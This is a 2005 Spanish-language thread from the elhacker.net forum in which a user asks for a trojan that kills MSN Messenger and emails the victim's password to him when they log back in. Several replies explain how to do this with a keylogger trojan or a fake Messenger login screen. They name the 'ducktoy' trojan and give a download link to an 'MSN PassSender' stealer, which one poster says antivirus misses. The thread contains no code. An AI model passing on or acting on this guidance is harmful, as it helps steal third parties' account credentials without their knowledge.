elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
23 Mayo 2012, 07:04  

Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Hay algun pequeño troyano que mate el preceso del msn y una vez que la victima..
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Hay algun pequeño troyano que mate el preceso del msn y una vez que la victima..  (Leído 686 veces)
satanboy

Desconectado Desconectado

Ver Perfil
Hay algun pequeño troyano que mate el preceso del msn y una vez que la victima..
« en: 19 Marzo 2005, 09:55 »

Hay algun pequeño troyano que mate el proceso del mesenger y una vez que la victima tenga que volver a logearse envie el pasword a una cuenta de email pre configurada ?
KHULT

Ver Perfil
Re: Hay algun pequeño troyano que mate el preceso del msn y una vez que la victi
« Respuesta #1 en: 19 Marzo 2005, 10:03 »

Hombre, con cualkier troyano con keyloger puedes hacer algo parecido. Una vez infectada la victima, entras en su pc, activas la opcion de keyloging, matas el proceso del messenger y cuando lo vuelva a abrir ya ves la pass de la cuenta que este usando en ese momento. Otra opcion es con un simple keyloger, solo que asi tendras que revisar todos los correos que te mande el programita. Especificamente un troyano k haga eso no creo que exista , pero siempre puedes buscar en el foro, que es siempre lo primero que hay que hacer.bye
satanboy

Ver Perfil
Re: Hay algun pequeño troyano que mate el preceso del msn y una vez que la victima..
« Respuesta #2 en: 19 Marzo 2005, 10:16 »

ok , ok se  que hay troyanos completos que hacen eso pero ,lo que busco es uno simple que haga esas dos tareas sin la necesitad de capturar su IP para luego con el  programa cliente del server activar  el keylogger.
Kizar

kizar_net

Ver Perfil
Re: Hay algun pequeño troyano que mate el preceso del msn y una vez que la victi
« Respuesta #3 en: 19 Marzo 2005, 10:39 »

Este programa no cierra el proceso pero te manda un email a la direccion que pongas en el client con el nombre vicrim , funciona lo he provado yo, y no es detectado por los antivirus, por lo menos k yo sepa.

Descargale de aqui: http://www.trojanfrance.com/index.php?dir=Stealer/&file=MSN%20PassSender.zip

Saludos

KHULT

Ver Perfil
« Respuesta #4 en: 19 Marzo 2005, 11:30 »

Siento contradecirte pero el KAV y el Norton si lo pillan :(
-Xenon-

Spectrum 128k

Ver Perfil
« Respuesta #5 en: 19 Marzo 2005, 11:34 »

mi pequeño troyano tiene esa opcion, es un fake del msn, y cierras el proceso y le muestras automaticamente la pantalla de inicio de sesion , el mete el pass y tu lo lees... valido solo para win xp

un saludo

Cuando el ingenio se queda pequeño,
No basta con poner empeño,
Solo el talento consigue el diseño
KHULT

Ver Perfil
« Respuesta #6 en: 19 Marzo 2005, 12:40 »

Y cual es tu troyano man?? Si no le dices como se llama o de donde lo puede bajar no le ayudas demasiado. bye
-Xenon-

Spectrum 128k

Ver Perfil
« Respuesta #7 en: 19 Marzo 2005, 19:38 »

mi troyano es pronto para publicarlo, mientras tanto el troyano ducktoy es bueno y tiene esa opcion tambien

lo podeis descargar de esta misma web!!!!

un saludo!!!

Cuando el ingenio se queda pequeño,
No basta con poner empeño,
Solo el talento consigue el diseño
BloCKeadO

Made in Spain.

Ver Perfil WWW
« Respuesta #8 en: 20 Marzo 2005, 00:28 »

Yo creo que lo que busca en un simple fake msn. Pero eso no es nigun troyano, simplemente simula ser el inicio de sesion del messenguer, el 1er loguin lo enviara a tu mail y el 2do ya se le iniciara la sesion normal.

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Te o Mate de planta de coca
Foro Libre
Golo12 2 346 Último mensaje 29 Febrero 2012, 13:55
por $Edu$